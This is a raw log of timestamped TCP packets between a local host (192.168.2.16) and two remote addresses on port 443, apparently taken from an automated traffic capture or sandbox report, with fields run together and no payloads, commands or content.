                                                                                                                                            Jan 15, 2025 19:14:39.000185013 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.000196934 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.000196934 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.000211954 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.000271082 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.000276089 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.000507116 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.000611067 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.000618935 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.004894018 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.004920959 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.004935026 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.004949093 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.004956007 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.004995108 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.024734020 CET44349850104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.024849892 CET44349850104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.024909973 CET49850443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.025475979 CET49850443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.025492907 CET44349850104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.025891066 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.025919914 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.025998116 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.026324987 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.026336908 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.027339935 CET44349853104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.028352022 CET49853443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.028369904 CET44349853104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.065126896 CET44349851104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.065388918 CET44349851104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.065453053 CET49851443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.065886974 CET49851443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.065915108 CET44349851104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.066251993 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.066284895 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.066348076 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.066788912 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.066807032 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.070622921 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.070853949 CET49854443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.070873976 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.071351051 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.071640968 CET49854443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.071727037 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.071801901 CET49854443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.072432995 CET49853443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.088356018 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.088429928 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.088496923 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.088514090 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.088531017 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.088562965 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.088640928 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.088646889 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.088887930 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.089063883 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.089123011 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.089152098 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.089185953 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.089201927 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.089209080 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.089231014 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.089951038 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.089984894 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090013981 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090034962 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.090040922 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090048075 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090070009 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.090099096 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090111017 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.090116978 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090197086 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.090203047 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090820074 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090846062 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.090867043 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.090879917 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.091336966 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.109705925 CET44349852104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.109780073 CET44349852104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.109853029 CET44349852104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.109904051 CET49852443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.109949112 CET49852443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.110652924 CET49852443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.110678911 CET44349852104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.111051083 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.111102104 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.111165047 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.111536026 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.111553907 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.119339943 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.126785040 CET44349853104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.126859903 CET44349853104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.126934052 CET49853443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.126945019 CET44349853104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.127245903 CET49853443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.127999067 CET49853443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.128026009 CET44349853104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.128504038 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.128532887 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.128601074 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.128988028 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.128997087 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.130585909 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.158901930 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.159194946 CET49855443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.159225941 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.159607887 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.159913063 CET49855443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.159979105 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.160042048 CET49855443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.172409058 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.172456980 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.172472000 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.172624111 CET49857443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.172674894 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.173027039 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.173476934 CET49857443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.173547983 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.173614025 CET49857443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.176676989 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.176727057 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.176753998 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.176764011 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.176851988 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.176876068 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.177403927 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.177432060 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.177469969 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.177476883 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.177483082 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.177504063 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.177512884 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.178021908 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.178057909 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.178076029 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.178080082 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.178090096 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.178119898 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.178133011 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.178137064 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.178257942 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.178925037 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.178965092 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.179009914 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.179009914 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.179017067 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.179075003 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.179976940 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180012941 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180046082 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180063009 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.180069923 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180078983 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180098057 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.180098057 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.180176020 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.180182934 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180289030 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.180499077 CET44349856104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180799007 CET49856443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.180861950 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180864096 CET44349856104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180891991 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180919886 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.180926085 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.180951118 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.181035042 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.181219101 CET44349856104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.181512117 CET49856443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.181592941 CET44349856104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.181619883 CET49856443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.186125994 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.186326027 CET49858443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.186372042 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.187834978 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.187922001 CET49858443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.188173056 CET49858443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.188266039 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.188271999 CET49858443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.204349041 CET49855443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.204380989 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.219357967 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.227344036 CET44349856104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.232892990 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.233119965 CET49859443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.233143091 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.234183073 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.234246969 CET49859443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.234524965 CET49859443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.234581947 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.234643936 CET49859443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.235336065 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.236330032 CET49856443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.236371040 CET49858443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.236387014 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.242744923 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.242860079 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.242917061 CET49854443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.242939949 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.243071079 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.243133068 CET49854443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.243514061 CET49854443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.243531942 CET44349854104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.243844032 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.243901968 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.244016886 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.244442940 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.244460106 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.265171051 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.265239954 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.265258074 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.265361071 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.265378952 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.265384912 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.265420914 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.265575886 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.265608072 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.265641928 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.265646935 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.265741110 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.266031981 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.266077042 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.266081095 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.266089916 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.266122103 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.266138077 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.266141891 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.266182899 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.266182899 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.266202927 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.266246080 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.266261101 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.266926050 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.266983032 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.266992092 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267096043 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267112017 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267175913 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267184019 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267199993 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267240047 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267251968 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267251968 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267261982 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267277002 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267280102 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267328978 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267348051 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267355919 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267399073 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267399073 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267406940 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267453909 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267560005 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267591000 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267602921 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.267644882 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267644882 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267920017 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.267976999 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.268165112 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.268419981 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.268430948 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.275331020 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.284346104 CET49858443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.284673929 CET49859443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.284692049 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.320703983 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.320765018 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.320842981 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.320847034 CET49855443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.320888996 CET49855443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.321600914 CET49855443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.321630001 CET44349855104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.322060108 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.322118998 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.323837996 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.324266911 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.324294090 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328288078 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328330040 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328366041 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328401089 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328408003 CET49857443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.328448057 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328466892 CET49857443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.328490019 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328520060 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328525066 CET49857443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.328533888 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328597069 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.328634024 CET49857443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.329346895 CET49857443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.329363108 CET44349857104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.330693960 CET49868443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.330737114 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.331020117 CET49868443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.331242085 CET49868443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.331257105 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.332329035 CET49859443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.343765974 CET44349856104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.343861103 CET44349856104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.343904972 CET49856443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.344508886 CET49856443192.168.2.16104.18.68.40
